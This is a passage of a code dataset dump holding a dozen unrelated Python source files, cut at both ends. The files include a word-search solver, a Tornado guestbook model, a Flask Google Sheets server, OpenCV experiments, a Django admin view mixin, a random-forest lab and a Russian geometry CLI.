'closed', 'd2': 'closed', 'd3': 'closed', }\n state.doorType = {'d1': UNK, 'd2': UNK, 'd3': UNK, }\n\ntasks = {\n 5: [['fetch', 'r1', 'o1', 6]],\n}\neventsEnv = 
{\n}","sub_path":"problems/SD/auto/problem104_SD.py","file_name":"problem104_SD.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447864126","text":"\"\"\"\nlz@2019/08/17\nTime Limit Exceeded\n\"\"\"\n\nimport copy\nclass Solution:\n def exist(self, board, word):\n if len(word) < 1:\n return(False)\n m = len(board)\n n = len(board[0])\n result = False\n for i in range(m):\n for j in range(n):\n if board[i][j] == word[0]:\n subboard = copy.deepcopy(board)\n subboard[i][j] = ' '\n answer = self.existSubstr(subboard, word[1:], i, j, m, n)\n if answer:\n result = True\n return(result)\n\n def existSubstr(self, board, substr, s_i, s_j, m, n):\n if len(substr) <= 0:\n return(True)\n elif len(substr) == 1:\n if substr in self.neighbor(board, s_i, s_j, m, n):\n return(True)\n else:\n return(False)\n else:\n neighbors = self.neighbor(board, s_i, s_j, m, n)\n if substr[0] in neighbors:\n answer = False\n for loc_i, loc_j in neighbors[substr[0]]:\n subboard = copy.deepcopy(board)\n subboard[loc_i][loc_j] = ' '\n result = self.existSubstr(subboard, substr[1:], loc_i, loc_j, m, n)\n if result:\n answer = True\n else:\n return(False)\n return(answer)\n\n def neighbor(self, board, i, j, m, n):\n answer = {}\n if i > 0:\n key = board[i-1][j]\n answer[key] = [(i-1, j)]\n if j > 0:\n key = board[i][j-1]\n if key not in answer:\n answer[key] = [(i, j-1)]\n else:\n answer[key].append((i, j-1))\n if i < (m - 1):\n key = board[i+1][j]\n if key not in answer:\n answer[key] = [(i + 1, j)]\n else:\n answer[key].append((i + 1, j))\n if j < n - 1:\n key = board[i][j+1]\n if key not in answer:\n answer[key] = [(i, j + 1)]\n else:\n answer[key].append((i, j + 1))\n return(answer)\n\n\n","sub_path":"archive/79_word_search_v1.py","file_name":"79_word_search_v1.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370039515","text":"# -*- coding: utf-8 -*-\n#\n# StockChamps\n# Matthew Kwon\n#\n\nfrom dp_tornado.engine.model import Model as dpModel\n\nclass BoardModel(dpModel):\n def get(self, board_seq=None):\n\n if board_seq:\n return self.row(\"\"\"\n SELECT\n *\n FROM\n BOARD\n WHERE\n seq = %s\n \"\"\", board_seq, 'sbscnbc.stockchamps.db/service')\n\n return None\n\n def list(self,\n sort=None,\n offset=0,\n limit=5,\n with_extras=False):\n\n params = []\n\n where_query = \"\"\" deletedate is null \"\"\"\n\n params.append(offset)\n params.append(limit)\n\n order_by = 'idx desc'\n\n output = []\n\n for e in self.rows(\"\"\"\n SELECT\n *\n FROM\n guest_books\n WHERE\n {where_query}\n ORDER BY\n {order_by}\n LIMIT %s, %s\"\"\"\n .replace('{where_query}', where_query)\n .replace('{order_by}', order_by), params,\n 'marry.db/service', to_dict=True):\n output.append({\n 'name': e['name'],\n 'contents': self.helper.marry.string.strip_tags(e['contents']),\n 'createdate': self.helper.datetime.yyyymmdd('-', e['createdate'])\n })\n\n return output\n\n def controller_post(self, controller):\n guest_name = controller.get_argument('guest_name', '').strip()\n contents = self.helper.marry.string.strip_tags(controller.get_argument('contents', '')).strip()\n\n # 이름 값 확인\n if not guest_name:\n return {\n 'result': False,\n 'reason': 'name-missing',\n 'message': self.config.marry.message.board.community_article_post_name_missing}\n\n # 내용 값 확인\n if not contents or not contents.replace(' ', ''):\n return {\n 'result': False,\n 'reason': 
'contents-missing',\n 'message': self.config.marry.message.board.community_article_post_contents_missing}\n\n\n ret = self.model.marry.board.post(guest_name, contents)\n\n if not ret:\n return {\n 'result': False,\n 'reason': 'server-error',\n 'message': self.config.marry.message.server_error}\n\n return {\n 'result': True,\n 'reason': 'succeed',\n 'message': self.config.marry.message.common_registered}\n\n def post(self, name, contents):\n\n proxy = self.begin('marry.db/service')\n\n try:\n params = (\n name,\n contents\n )\n\n proxy.execute(\"\"\"\n INSERT INTO guest_books\n (name, contents, createdate)\n VALUES\n (%s, %s, sysdate())\n \"\"\", params)\n\n proxy.commit()\n\n return True\n\n except Exception as e:\n proxy.rollback()\n\n self.logging.exception(e)\n\n return False","sub_path":"model/bjs/board/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"271409553","text":"from __future__ import print_function\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\nimport flask\nfrom flask import request, jsonify\nfrom flask_cors import CORS\nimport pickle\nimport os.path\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nfrom datetime import datetime\n\n# If modifying these scopes, delete the file token.pickle.\nSHEET_SCOPES = ['https://www.googleapis.com/auth/spreadsheets.readonly']\n\nDOOR_KNOCKING_SPREADSHEET_ID = '15NkVPeWOJvkDwY8tPCPhX16bDk9m2_TjU-ioGHa3LnY'\nDOOR_KNOCKING_RANGE = 'Kontakt/samtaler!K2:M9'\nFULL_RANGE = 'Kontakt/samtaler!A1:I100'\n\ndef setupSheetsService():\n store = file.Storage('token-sheets.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials-sheets.json', SHEET_SCOPES)\n creds = tools.run_flow(flow, store)\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n\n return build('sheets', 'v4', credentials=creds)\n\ndef getDoorKnockingStats():\n service = setupSheetsService()\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=DOOR_KNOCKING_SPREADSHEET_ID,\n range=DOOR_KNOCKING_RANGE).execute()\n return result.get('values')\n\ndef getFullDoorKnockingStats():\n service = setupSheetsService()\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=DOOR_KNOCKING_SPREADSHEET_ID,\n range=FULL_RANGE).execute()\n return result.get('values')\n\nif __name__ == '__main__':\n server = flask.Flask(__name__)\n CORS(server)\n server.config[\"DEBUG\"] = True\n\n\n @server.route('/', methods=['GET'])\n def home():\n return \"it works!\"\n\n @server.route('/doors', methods=['GET'])\n def doorStats():\n return jsonify(getDoorKnockingStats())\n\n @server.route('/doors/extended', methods=['GET'])\n def fullDoorStats():\n return jsonify(getFullDoorKnockingStats())\n\n server.run(host='0.0.0.0')\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4203365","text":"import numpy as np\nimport cv2\nfrom itertools import count\n\ndef combine(img1, img2):\n vis = 
np.concatenate((img1, img2), axis=0)\n return vis\n\n# cap = cv2.VideoCapture('/mnt/hgfs/Desktop/trimmed1.mov')\ncap = cv2.VideoCapture('/mnt/hgfs/Desktop/brain_wash_10_14_2014.mp4')\n# cap = cv2.VideoCapture('./slow_brain_wash_10_14_2014.avi')\n# cap = cv2.VideoCapture('./video.avi')\ndef get_mean(filename):\n cap = cv2.VideoCapture(filename)\n ret, frame = cap.read()\n sum_frame = frame.astype('float32')\n counter = 1\n while ret:\n counter += 1\n sum_frame += frame\n ret, frame = cap.read()\n return (sum_frame / float(counter)).astype('uint8')\n \ndef main3():\n ret, frame1 = cap.read()\n for j in range(100):\n _, frame2 = cap.read()\n grayImage1 = cv2.cvtColor(frame1, cv2.COLOR_RGB2GRAY)\n grayImage2 = cv2.cvtColor(frame2, cv2.COLOR_RGB2GRAY)\n\n cornerMem = []\n cornerCount = 300\n qualityLevel = 0.1\n minDistance = 5\n cornerMem = cv2.goodFeaturesToTrack(grayImage1, cornerCount, qualityLevel, minDistance)\n\n nextPts, _, _ = cv2.calcOpticalFlowPyrLK(grayImage1, grayImage2, cornerMem, None)\n for p1, p2 in zip(cornerMem, nextPts):\n center1 = int(p1[0][0]), int(p1[0][1])\n center2 = int(p2[0][0]), int(p2[0][1])\n cv2.circle(frame2, (center2), 2, (0,255,255))\n cv2.circle(frame2, (center1), 2, (0,255,255))\n cv2.line(frame2, center1, center2, (128,128,128))\n\n cv2.imshow('frame', frame2)\n while True:\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n \n\ndef main():\n sum_frame = get_mean('./slow_brain_wash_10_14_2014.avi')\n cv2.imwrite('output.jpg', sum_frame)\n\n \ndef main2():\n background = cv2.imread('output.jpg')\n fgbg = cv2.BackgroundSubtractorMOG2(10,100,128)# (10, 50, 0.5)\n fgbg2 = cv2.BackgroundSubtractorMOG2(10,100,128)\n fgbg.apply(background)\n fgbg2.apply(background)\n\n for i in count(1):\n ret, frame = cap.read()\n # if i % 100 == 0:\n # fgbg2 = cv2.BackgroundSubtractorMOG2(1,10,128)\n if i % 1 == 0:\n fgmask = fgbg.apply(frame)\n fgmaskcolor = cv2.cvtColor(fgmask, cv2.COLOR_GRAY2BGR)\n\n fgmask2 = fgbg2.apply(frame)\n fgmaskcolor2 = cv2.cvtColor(fgmask2, cv2.COLOR_GRAY2BGR)\n\n fgmaskcolor2 -= fgmaskcolor\n\n # cv2.imshow('frame',fgmask)\n cv2.imshow('frame',reduce(combine, [frame, fgmaskcolor, fgmaskcolor2]))\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main3()\n","sub_path":"python/cv/background_subtraction.py","file_name":"background_subtraction.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261442328","text":"import math\nimport rolldice\nfrom consts import *\n\ndef abilityMod(score):\n return math.floor((score-10)/2)\n\ndef getSkillCheckRoll(self, check, advantage):\n # Handle Advantage\n if advantage in [\"adv\", \"advantage\", \"a\"]:\n adv = \"K\"\n num = 2\n elif advantage in [\"dis\", \"disadvantage\", \"d\"]:\n adv = \"k\"\n num = 2\n else:\n adv = \"\"\n num = 1\n\n # Skill Check\n if check in skills:\n # Header Print for Skill Check\n for i in categories:\n if check in categories[i]:\n mod = abilityMod(self.abilities[i])\n if check in self.proficiencies:\n mod += self.pb\n modStr = f\"{str(mod)}\"\n if mod >= 0:\n modStr = f\"+{str(mod)}\"\n print(f\"\\n\\n{self.pname} Skill Check: {color.BOLD}{check}{color.END} ({modStr})\")\n roll = rolldice.roll_dice(f'{num}d20{adv} + {mod}')\n print(bigNums[roll[0]])\n \n # Ability Check\n elif check in abilities:\n mod = abilityMod(self.abilities[check])\n modStr = f\"{str(mod)}\"\n if 
mod >= 0:\n            modStr = f\"+{str(mod)}\"\n        print(f\"\\n\\n{self.pname} Ability Check: {color.BOLD}{ablLong[check]}{color.END} ({modStr})\")\n        roll = rolldice.roll_dice(f'{num}d20{adv} + {mod}')\n        print(bigNums[roll[0]])\n    \n    # Unrecognized Input\n    else:\n        print(f\"{check} is not a valid skill or ability.\")","sub_path":"ability.py","file_name":"ability.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"279794319","text":"# -*- coding: utf-8 -*-\n\nfrom django import template\nfrom django.conf.urls.defaults import url, patterns\nfrom django.contrib import admin\nfrom django.contrib.admin.util import unquote\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.utils.encoding import force_unicode\nfrom django.utils.html import escape\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.context_processors import request\n\nclass ModelAdminViewMixin(object):\n    '''\n    Adds view-only functionality for a database object.\n    Allows you to override the view templates, following rules similar to ModelAdmin's.\n    Changes the permission check for changelist_view - allows access\n    to the changelist with only the view permission. Checks the model's view permission\n    according to the pattern view_MODELNAMELOWERCASE.\n    \n    The additional permission view_row_MODELNAMELOWERCASE allows access only to the view page,\n    without the changelist. It also wraps change_view and redirects all requests that\n    have only the view_row_* permission to the view page.\n    \n    NOTICE! This mixin changes the standard permission check in order to grant access to\n    the changelist with only the view permission.\n    I hope this will not affect site security :)\n    \n    View template paths are:\n    dadds/admin/row_view.html\n    admin/APP_LABEL/row_view.html\n    admin/APP_LABEL/MODEL_NAME/row_view.html\n    \n    The reverse URL name is APP_MODEL_view\n    \n    #Usage\n    class MyModelAdmin(ModelAdminViewMixin, ModelAdmin):\n        pass\n    '''\n    \n    # Path to a custom view template\n    object_view_template = None\n    \n    def __init__(self, *args, **kwargs):\n        self.changelist_view = self.changelist_view_wrapper(self.changelist_view)\n        self.change_view = self.change_view_wrapper(self.change_view)\n        super(ModelAdminViewMixin, self).__init__(*args, **kwargs)\n    \n    def changelist_view_wrapper(self, changelist_view):\n        \"\"\"\n        Wrap changelist_view so the changelist is available with only the view\n        permission. On POST requests the standard permission check is used.\n        \"\"\"\n        def wrapper(request, *args, **kwargs):\n            tmp_has_change_permission = None\n            result = None\n            \n            if not request.method == 'POST':\n                tmp_has_change_permission = self.has_change_permission\n                self.has_change_permission = self.has_view_permission\n            \n            result = changelist_view(request, *args, **kwargs)\n            \n            if tmp_has_change_permission is not None:\n                self.has_change_permission = tmp_has_change_permission\n            \n            return result\n        return wrapper\n    \n    def change_view_wrapper(self, change_view):\n        \"\"\"\n        Wrapper around change_view.\n        Redirects all requests that have only the view_row_MODELNAMELOWERCASE\n        permission to the row view page.\n        \"\"\"\n        def wrapper(request, object_id, *args, **kwargs):\n            obj = self.get_object(request, unquote(object_id))\n            \n            if not self.has_change_permission(request, obj) and self.has_view_permission(request, obj, _view_row_perm=True):\n                opts = self.opts\n                return HttpResponseRedirect(reverse('admin:%s_%s_view' % 
(opts.app_label, opts.module_name), args=[object_id]))\n \n return change_view(request, object_id, *args, **kwargs)\n return wrapper\n \n def get_model_perms(self, request):\n \"\"\"\n Override standard change permission (hope this will help to display link in dashboard)\n Add new view permission to common model permissions \n \"\"\"\n perms = super(ModelAdminViewMixin, self).get_model_perms(request)\n perms['change'] = self.has_view_permission(request)\n perms['view'] = self.has_view_permission(request, _view_row_perm=True)\n return perms\n \n def get_urls(self):\n \"\"\"\n Adds row view to the urls\n \"\"\"\n urls = super(ModelAdminViewMixin, self).get_urls()\n info = self.model._meta.app_label, self.model._meta.module_name\n my_urls = patterns('',\n url(r'^(.+)/view/$', admin.site.admin_view(self.row_view), name='%s_%s_view' % info),\n )\n return my_urls + urls\n \n def get_view_extra_context(self, request, obj=None):\n \"\"\"\n Returns extra context for view row template.\n You can implement this function to add custom data to the template.\n For example you can process here data from linked models.\n \"\"\"\n pass\n \n def has_view_permission(self, request, obj=None, _view_row_perm=False):\n \"\"\"\n Check if user has view permissions.\n You can override this method to correct access check.\n I'm recommended to add model permission name 'view_MODELNAMELOWERCASE'\n this method will check it by default.\n \"\"\"\n opts = self.opts\n perms = ['%s.view_%s' % (opts.app_label, opts.object_name.lower()), '%s.%s' % (opts.app_label, opts.get_change_permission())]\n if _view_row_perm:\n perms.append('%s.view_row_%s' % (opts.app_label, opts.object_name.lower()))\n \n for perm in perms:\n if request.user.has_perm(perm):\n return True\n return False \n \n def row_view(self, request, object_id, extra_context=None):\n \"\"\" Render object view page \"\"\"\n opts = self.model._meta\n app_label = opts.app_label\n \n obj = self.get_object(request, unquote(object_id))\n\n if not self.has_view_permission(request, obj, _view_row_perm=True):\n raise PermissionDenied\n \n if obj is None:\n raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})\n\n context = {\n 'app_label': opts.app_label,\n 'fields': self.get_model_instance_fields(obj),\n 'has_change_permission': self.has_change_permission(request),\n 'has_delete_permission': self.has_delete_permission(request),\n 'instance': obj,\n 'opts': opts,\n 'title': _('View %s #%s') % (opts.verbose_name, obj.pk),\n } \n context.update(extra_context or {}) \n context.update(self.get_view_extra_context(request, obj) or {}) \n context_instance = template.RequestContext(request, current_app=self.admin_site.name)\n return render_to_response(self.object_view_template or [\n 'admin/%s/%s/row_view.html' % (app_label, opts.object_name.lower()),\n 'admin/%s/row_view.html' % app_label,\n 'dadds/admin/row_view.html'\n ], context, context_instance=context_instance)\n \n def get_model_instance_fields(self, obj):\n \"\"\"\n Returns a list of all field names on the instance.\n You may use this method to list sub models fields in get_view_extra_context.\n \"\"\"\n from django.db.models.fields.files import FieldFile\n fields = []\n for f in obj._meta.fields:\n fname = f.name \n # resolve picklists/choices, with get_xyz_display() function\n get_choice = 'get_' + fname + '_display'\n is_file = False\n if hasattr(obj, get_choice):\n value = getattr(obj, get_choice)()\n else:\n try :\n value = 
getattr(obj, fname)\n if isinstance(value, FieldFile):\n is_file = True\n except obj.DoesNotExist:\n value = None\n\n fields.append({\n 'label':f.verbose_name,\n 'name':f.name,\n 'value':value,\n 'is_file':is_file,\n })\n return fields\n","sub_path":"dadds/admin/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"471636294","text":"import contextlib\n\nimport redis\nfrom sqlalchemy import orm, engine_from_config\n\nfrom config import Config\n\n__all__ = [\"db\", \"session\"]\n\n\n@contextlib.contextmanager\ndef session():\n \"\"\"\n Provide a transactional scope around a series of operations\n \"\"\"\n s = db.Session()\n try:\n yield s\n s.commit()\n except:\n s.rollback()\n raise\n finally:\n s.close()\n\n\nclass SqlAlchemy(object):\n \"\"\"\n 数据库包装类\n \"\"\"\n\n def __init__(self):\n self._engine = engine_from_config(Config[\"database\"])\n self._session_factory = orm.sessionmaker(bind=self._engine, expire_on_commit=False)\n self.Session = orm.scoped_session(session_factory=self._session_factory)\n self.Redis = self.init_redis()\n\n def init_tables(self):\n from db.models import Model\n Model.metadata.create_all(self._engine)\n\n @staticmethod\n def init_redis():\n pool = redis.ConnectionPool(**Config[\"redis\"])\n return redis.Redis(connection_pool=pool)\n\n\ndb = SqlAlchemy()\n","sub_path":"db/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"497289420","text":"from reportlab.lib import colors\nfrom reportlab.lib.units import cm\nfrom Bio.Graphics import GenomeDiagram\nfrom Bio import SeqIO\n\nrecord = SeqIO.read(\"Genome.gb\", \"genbank\")\n\n#creating empty diagram, empty track, and empty feature set\ngd_diagram = GenomeDiagram.Diagram(\"Tomato Curly Stunt Virus\")\ngd_track_for_features = gd_diagram.new_track(1, name = \"Annotated Features\")\ngd_feature_set = gd_track_for_features.new_set()\n\n#taking each gene in record and generating feature on the diagram\nfor feature in record.features:\n if feature.type != \"gene\":\n continue\n if len(gd_feature_set) % 2 == 0:\n color = colors.blue\n else:\n color = colors.lightblue\n gd_feature_set.add_feature(feature, color = color, label = True, label_size = 14, label_angle = 0)\n\n#making output file\ngd_diagram.draw(\n format = \"circular\",\n circular = True,\n pagesize = (20 * cm, 20 * cm),\n start = 0,\n end = len(record),\n circle_core = 0.7,\n)\ngd_diagram.write(\"genome_map.png\", \"PNG\") \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"93034684","text":"import csv\nimport math\nimport random\nfrom collections import defaultdict\nfrom collections import Counter\nfrom typing import *\n\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn.impute import SimpleImputer\n\nclass DataItem:\n def __init__(self, row: list):\n self.attributes = [None] * 13\n for i in range(len(self.attributes)):\n self.attributes[i] = None if row[i] == \"?\" else row[i]\n self.final_class = row[len(row) - 1]\n\n def __str__(self):\n return str(self.attributes) + \", \" + str(self.final_class)\n\nclass DecisionTree:\n def __init__(self, train_mas: List[DataItem], trees_depth: int):\n n_attributes = len(train_mas[0].attributes)\n\n self.attr_subset_indexes = 
random.sample(range(n_attributes), trees_depth)\n        attribute_subset = [subset_by_indexes(item.attributes, self.attr_subset_indexes) for item in train_mas]\n\n        classes = [item.final_class for item in train_mas]\n\n        self.sk_dec_tree = tree.DecisionTreeClassifier()\n        self.sk_dec_tree.fit(attribute_subset, classes)\n\n    def predict(self, X) -> list:\n        X = [subset_by_indexes(attrs, self.attr_subset_indexes) for attrs in X]\n        return self.sk_dec_tree.predict(X)\n\nclass decision_forest:\n    def __init__(self, decision_trees: List[DecisionTree]):\n        self.decision_trees = decision_trees\n\n    def predict(self, X) -> list:\n        vote_table = zip(*[dec_tree.predict(X) for dec_tree in self.decision_trees])\n        return [Counter(votes).most_common(1)[0][0] for votes in vote_table]\n\ndef read_csv_file(file: str) -> List[DataItem]:\n    with open(file) as csv_file:\n        reader = csv.reader(csv_file)\n        next(reader)\n        return [DataItem(row) for row in reader]\n\ndef fill_missing_attributes(data: List[DataItem]) -> List[DataItem]:\n    imp = SimpleImputer(missing_values=np.nan, strategy='mean')\n    attributes = [item.attributes for item in data]\n    imp = imp.fit_transform(attributes)\n    return [DataItem([*imp[i], data[i].final_class]) for i in range(len(data))]\n\ndef initialize():\n    full_data_mas = read_csv_file('heart_data.csv')\n    full_data_mas = fill_missing_attributes(full_data_mas)\n    return full_data_mas\n\ndef subset_by_indexes(l: list, indexes: List[int]) -> list:\n    return [l[i] for i in indexes]\n\ndef split_data(data: List[DataItem], train_mas_ratio: float) -> Tuple[List[DataItem], List[DataItem]]:\n    n = len(data)\n    n_training = int(n * train_mas_ratio)\n\n    grouped_by_class = defaultdict(list)\n    for entry in data:\n        grouped_by_class[entry.final_class].append(entry)\n    classes = list(grouped_by_class.keys())\n\n    train_mas = []\n    test_mas = []\n\n    class_i = 0\n    for i in range(n):\n        class_i = (class_i + 1) % len(classes)\n        final_class = classes[class_i]\n        group = grouped_by_class[final_class]\n        if len(group) == 0:\n            classes.remove(final_class)\n            continue\n\n        item = group.pop(random.randint(0, len(group) - 1))\n        target_data = train_mas if i < n_training else test_mas\n        target_data.append(item)\n\n    return train_mas, test_mas\n\ndef main():\n    optimal_iteration = 0\n    optimal_trees = 0\n    optimal_depth = 0\n    optimal_average = 0\n    iterations = 1\n    while iterations <= 10:\n        average = 0\n        full_data_mas = initialize()\n        (train_mas, test_mas) = split_data(full_data_mas, 0.7)\n        trees_count = 10\n        while trees_count <= 50:\n            trees_depth = 2\n            while trees_depth <= 8:\n                correct_precisions = 0\n                decision_trees = [DecisionTree(train_mas, trees_depth) for i in range(trees_count)]\n                decision_trees_forest = decision_forest(decision_trees)\n                predicted: list = decision_trees_forest.predict([item.attributes for item in test_mas])\n                for i in range(len(predicted)):\n                    if predicted[i] == test_mas[i].final_class:\n                        correct_precisions = correct_precisions + 1\n                print(\"Iteration:\" + str(iterations) + \" Trees:\" + str(trees_count) + \" Depth:\" + str(trees_depth) +\" Result:\" + str(correct_precisions / len(test_mas)))\n                if correct_precisions / len(test_mas) > optimal_average:\n                    optimal_iteration = iterations\n                    optimal_average = (correct_precisions / len(test_mas))\n                    optimal_trees = trees_count\n                    optimal_depth = trees_depth\n                average += (correct_precisions / len(test_mas))\n                trees_depth += 1\n            trees_count += 10\n        print(\"Average for Iteration\" + str(iterations) + \" \" + str(average / 35))  # 35 runs per iteration: 5 tree counts * 7 depths\n        iterations += 1\n    print(\"Optimal parameters:\" + 
\"Iteration: \" + str(optimal_iteration) + \" Trees: \" + str(optimal_trees) + \" Depth: \" + str(optimal_depth) + \" Precisions: \" + str(optimal_average))\n\n\nif __name__ == '__main__':\n main()\n exit()\n","sub_path":"Lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455807717","text":"from __future__ import division\nimport matlab.engine\nimport matlab\nimport pylab as pl\nimport numpy as np\nfrom math import pi\n\neng = matlab.engine.start_matlab()\neng.cd(r'/home/paharov/CSNL/gabor/matlab_scripts/gabor_ind/')\n\ndef get_gabor_feats():\n a = []\n thetas = 4\n xs = 8\n ys = 8\n for sig in range(2):\n for lam in range(2):\n for thet in range(thetas):\n for loc_x in range(xs):\n for loc_y in range(ys):\n a.append(np.ndarray.flatten(np.asarray(eng.eval(\"gabor_b('theta', \"\n + str((thet*pi)/thetas) + \", 'lambda', \"\n + str((4/(sig+1))/(0.2*(lam+1))) + \", 'Sigma', \" + str(4/((sig/2)+1)+4) +\n \", 'width', 32, 'height', 32, 'px', \" + str((1/(xs-1))*loc_x) +\n \", 'py', \" + str((1/(ys-1))*loc_y) + \")\"))))\n return a\n\nif __name__ == '__main__':\n def get_gabor_feats_plt():\n a = []\n thetas = 4\n xs = 8\n ys = 8\n for sig in range(2):\n for lam in range(2):\n for thet in range(thetas):\n for loc_x in range(xs):\n for loc_y in range(ys):\n a.append(eng.eval(\"gabor_b('theta', \"\n + str((thet*pi)/thetas) + \", 'lambda', \"\n + str((4/(sig+1))/(0.2*(lam+1))) + \", 'Sigma', \" + str(4/((sig/2)+1)+4) +\n \", 'width', 32, 'height', 32, 'px', \" + str((1/(xs-1))*loc_x) +\n \", 'py', \" + str((1/(ys-1))*loc_y) + \")\"))\n return a\n\n a = get_gabor_feats_plt()\n for n in range(32):\n # Plots the simple pixel filters\n f = pl.figure(facecolor='white')\n #pl.title('Feature bank (simple lines, 16x16)')\n pl.tick_params(axis='both', which='both', bottom='off', top='off', left='off',\n labelleft='off', labelbottom='off', right='off')\n pl.axis('off')\n for i in range(32):\n f.add_subplot(4, 8, i+1)\n pl.imshow(a[i+(n*32)], cmap='Greys_r', interpolation='nearest', vmin=-1, vmax=1)\n pl.tick_params(axis='both', which='both', bottom='off', top='off', left='off',\n labelleft='off', labelbottom='off', right='off')\n pl.savefig('/home/paharov/CSNL/gabor/gabor02/img02/feat_bank' + str(n) + '.png')\n pl.close()\n #pl.show()\n","sub_path":"code/filter05.py","file_name":"filter05.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580181284","text":"from __future__ import unicode_literals\nimport CClass\n\n\nclass Command(object):\n \"\"\" Command-line work\n \"\"\"\n\n def __init__(self):\n self._functions = {\n 0: self.exit_cmd,\n 3: self.square,\n 2: self.perimeter,\n 1: self.insc_desc,\n }\n self._prompt = \"Введите номер команды из списка и нажмите ENTER:\\n\"\n for key, cmd in self._functions.items():\n self._prompt += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n\n def hello_cmd(self):\n \"\"\"\n Добро пожаловать!\n :return str:\n \"\"\"\n prompt = \"Добро пожаловать!\\n\" + self._prompt\n return prompt\n\n def exit_cmd(self):\n \"\"\" выход\n \"\"\"\n print(\"До свидания!\")\n exit()\n\n def nazad(self):\n \"\"\" назад\n \"\"\"\n self.run()\n\n def unknown_cmd(self):\n \"\"\"\n Получена неизвестная команда!\n :return str:\n \"\"\"\n prompt = \"Получена неизвестная команда!\" + self._prompt\n return prompt\n\n\n def insc_desc(self):\n \"\"\" вписана или 
описана окружность\n \"\"\"\n\n def insc_desc_square_rectangle():\n \"\"\" окружность вписана или описана окола квадрата\n \"\"\"\n rectangl = CClass.Rectangle()\n rectangl.width = float(input(\"Ширина = \"))\n rectangl.height = float(input(\"Высота = \"))\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n if rectangl.width == rectangl.height:\n if CClass.inscribed_square_rectangle(rectangl, circle):\n return \"Окружность вписана в квадрат\"\n elif CClass.described_square_rectangle(rectangl, circle):\n return \"Окружность описана около квадрата\"\n else:\n return \"Окружность и не вписана и даже не \" \\\n \"описана окола квадрата\"\n else:\n return \"Данные введены не верно\"\n\n def insc_desc_square_triangle():\n \"\"\" окружность вписана или описана окола треугольника\n \"\"\"\n triangle = CClass.Triangle()\n triangle.katet = (float(input(\"1 катет = \")),\n float(input(\"2 катет = \")),\n float(input(\"3 катет = \"))\n )\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n if triangle._params[\"katet\"][0] == triangle._params[\"katet\"][1] == \\\n triangle._params[\"katet\"][2]:\n if CClass.inscribed_triangle(circle, triangle):\n return \"Окружность вписана в треугольник\"\n elif CClass.described_triangle(circle, triangle):\n return \"Окружность описана около треугольника\"\n else:\n return \"Окружность не вписана и даже не \" \\\n \"описана окола треугольника\"\n else:\n return \"Данные введены не верно \\n\\n\"\n\n functions = {\n 2: insc_desc_square_rectangle,\n 1: insc_desc_square_triangle,\n 0: self.nazad,\n }\n prompt2 = \"Введите номер и нажмите ENTER:\\n\"\n for key, cmd in functions.items():\n prompt2 += \"\"\"{0}: {1}\\n\"\"\".format(key, cmd.__doc__.strip())\n print(prompt2)\n i = 1\n while i:\n i = int(input())\n result = functions.get(i, self.unknown_cmd)()\n print(result, \"\\n\")\n\n def run(self):\n \"\"\" Запуск командного режима\n \"\"\"\n i = 1\n print(self.hello_cmd())\n while i:\n i = int(input())\n result = self._functions.get(i, self.unknown_cmd)()\n print(result, \"\\n\")\n\n\n def perimeter(self):\n \"\"\" найти периметр фигуры\n \"\"\"\n\n def circle_perimeter():\n \"\"\" круг\n \"\"\"\n circle = CClass.Circle()\n circle.radius = float(input(\"Радиус = \"))\n return circle.get_length()\n\n def triangle_perimeter():\n \"\"\" треугольник\n \"\"\"\n triangle = CClass.Triangle()\n triangle.katet = (float(input(\"1 катет = 